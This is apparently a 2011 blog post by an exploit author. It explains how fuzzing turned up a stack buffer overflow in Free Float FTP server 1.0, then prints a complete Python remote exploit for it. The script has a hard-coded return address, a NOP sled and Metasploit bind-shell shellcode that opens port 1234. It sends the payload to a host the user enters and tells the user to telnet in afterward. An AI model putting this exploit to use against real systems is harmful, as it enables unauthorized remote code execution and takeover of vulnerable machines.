Wednesday, September 28, 2011

Free Float Ftp server stack buffer overflow

First of all i fired Metasploit Fuzzer aginst this FTP server.The fuzzer worked like butter.
Near 250 bytes of Junk the program crashed and checked the yahoooooo....the offset was overwritten with metasploit pattern.
I started writing the exploit.Like always python is my best choice for writing exploits.So the exploit code is in python.
The shell code added with the exploit is windows_shell_bind_tcp.it spawns a bindshell on port 1234.
generated form Metasplot frmaework.
The bad characters are removed form the shell code using metasplot encoder.

I have published this exploit @ packet sortm security and Injector


You can find the exploit code @

http://packetstormsecurity.org/files/author/9123/


http://1337day.com/exploits/16737
# Exploit Title: Free Float FTP server Response stack Buffer Overflow Exploit
# Date: 21-08-2011
# Author: Debasish Mandal   http://www.facebook.com/raza.whitehat
# Software Link: http://www.freefloat.com/sv/freefloat-ftp-server/freefloat-ftp-server.php
# Version: 1.0
# Category:: Remote
# Tested on: Windows XP SP2.


#!/usr/bin/python

import  socket,sys
from struct import pack

buff = "A"* 251 
junk = "A"*5
nop = "\x90"*20
eip = pack('<L',0x77F5801C)

#Shell code generated by Metasploit frmaework.
#Shell Code :: windows/shell/bind_tcp.
#Local PORT :: 1234.
#Neglected BAD CHARACTERS  are "\x00","\x0a" &\x0d".
shellcode = ("\xbd\xe6\x09\xc6\x4f\xd9\xc4\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x4b\x83\xc2\x04\x31\x6a\x10\x03\x6a\x10\x04\xfc\x3a\xa7\x41"
"\xff\xc2\x38\x31\x89\x26\x09\x63\xed\x23\x38\xb3\x65\x61\xb1"
"\x38\x2b\x92\x42\x4c\xe4\x95\xe3\xfa\xd2\x98\xf4\xcb\xda\x77"
"\x36\x4a\xa7\x85\x6b\xac\x96\x45\x7e\xad\xdf\xb8\x71\xff\x88"
"\xb7\x20\xef\xbd\x8a\xf8\x0e\x12\x81\x41\x68\x17\x56\x35\xc2"
"\x16\x87\xe6\x59\x50\x3f\x8c\x05\x41\x3e\x41\x56\xbd\x09\xee"
"\xac\x35\x88\x26\xfd\xb6\xba\x06\x51\x89\x72\x8b\xa8\xcd\xb5"
"\x74\xdf\x25\xc6\x09\xe7\xfd\xb4\xd5\x62\xe0\x1f\x9d\xd4\xc0"
"\x9e\x72\x82\x83\xad\x3f\xc1\xcc\xb1\xbe\x06\x67\xcd\x4b\xa9"
"\xa8\x47\x0f\x8d\x6c\x03\xcb\xac\x35\xe9\xba\xd1\x26\x55\x62"
"\x77\x2c\x74\x77\x01\x6f\x11\xb4\x3f\x90\xe1\xd2\x48\xe3\xd3"
"\x7d\xe2\x6b\x58\xf5\x2c\x6b\x9f\x2c\x88\xe3\x5e\xcf\xe8\x2a"
"\xa5\x9b\xb8\x44\x0c\xa4\x53\x95\xb1\x71\xf3\xc5\x1d\x2a\xb3"
"\xb5\xdd\x9a\x5b\xdc\xd1\xc5\x7b\xdf\x3b\x6e\x4a\xfb\x97\xf9"
"\xae\xfb\x13\x28\x27\x1d\x71\xdc\x61\xb5\xee\x1e\x56\x0e\x88"
"\x61\xbd\x22\x01\xf6\x8a\x2c\x95\xf9\x0b\x7b\xb5\x56\xa4\xec"
"\x4e\xb5\x71\x0c\x51\x90\xd2\x59\xc6\x6e\xb2\x28\x76\x6e\x9f"
"\xd9\x78\xfa\x1b\x48\x2e\x92\x21\xad\x18\x3d\xda\x98\x12\xf4"
"\x4e\x63\x4d\xf9\x9e\x63\x8d\xaf\xf4\x63\xe5\x17\xac\x37\x10"
"\x58\x79\x24\x89\xcd\x81\x1d\x7d\x45\xe9\xa3\x58\xa1\xb6\x5c"
"\x8f\x33\x8b\x8a\xf6\xb1\xfd\xb8\x1a\x7a")

buff += eip
buff += nop
buff += shellcode
buff += junk
HOST = raw_input("Enter the target host : ")
PORT = raw_input("Enter the targer port (Default 21): ")
print "[*] Connecting to the host "+HOST+" on port "+PORT 
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
connect=s.connect((HOST, int(PORT)))
print "[*]Connected to target FTP Server!"
except:
print "[*] FTP Server didn't respond\n"
sys.exit(0)
data=s.recv(1024)
print "[*]Sending PAYLOAD to the target server"
s.send(buff+'\r\n')
print "[*]Exploit Completed..."
print "[*]Now telnet to the server on port 1234"


# 1337day.com [2011-08-21]